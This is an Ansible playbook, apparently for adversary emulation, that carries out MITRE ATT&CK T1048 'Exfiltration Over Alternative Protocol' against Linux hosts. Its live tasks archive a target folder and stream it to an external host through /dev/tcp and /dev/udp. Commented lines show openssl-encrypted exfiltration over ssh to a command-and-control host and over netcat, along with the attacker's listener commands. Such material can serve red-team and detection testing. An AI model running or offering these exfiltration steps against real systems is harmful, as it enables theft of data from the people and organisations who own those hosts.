# Playbook-T1048
- name : Exfiltration Over Alternative Protocol
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Ansible check directory exists example.
      stat:
        path: "{{ exfiltration_folder }}"
      register: exfil_check
    - name: Exfiltration Over Alternative Protocol - SSH
      shell: |
        echo port closed
        #tar czpf - {{ exfiltration_folder }}/* | openssl aes-256-cbc -salt -k {{ password_encryption }} | ssh {{ cnc_fqdn }} 'cat > {{ exfiltration_file }}-ssh.tar.gz.enc'
        # decrypt file on cnc: openssl aes-256-cbc -d -salt -k {{ password_encryption }} -in {{ exfiltration_file }}.tar.gz.enc -out {{ exfiltration_file }}.tar.gz    
      when: exfil_check.stat.exists
    - name: Exfiltration Over Alternative Protocol - SSL/443
      shell: |
        echo skipping
        #tar czpf - {{ exfiltration_folder }}/* | openssl aes-256-cbc -salt -k {{ password_encryption }} | nc -w1 {{ exfil_fqdn }} {{ exfil_port }}
        #attacker: nc -lp {{ exfil_port }} | openssl aes-256-cbc -d -k $pass {{ password_encryption }} > {{ exfiltration_file }}-ssl.tar.gz.enc
      when: exfil_check.stat.exists
    - name: Create Archive File
      archive:
        path: "{{ exfiltration_folder }}/*"
        dest: "/tmp/{{ exfiltration_file }}.gz"
        format: gz
      when: exfil_check.stat.exists
    - name: Exfiltration Over Alternative Protocol TCP
      command: cat /tmp/{{ exfiltration_file }}.gz > /dev/tcp/{{ exfil_fqdn }}/{{ exfil_port }}
      # netcat -lvp > {{ exfiltration_file }}-tcp.gz
      when: exfil_check.stat.exists
    - name: Exfiltration Over Alternative Protocol UDP
      shell: |
        cat /tmp/{{ exfiltration_file }}.gz > /dev/udp/{{ exfil_fqdn }}/{{ exfil_port }}
        # netcat -lvp > {{ exfiltration_file }}-udp.gz
      when: exfil_check.stat.exists
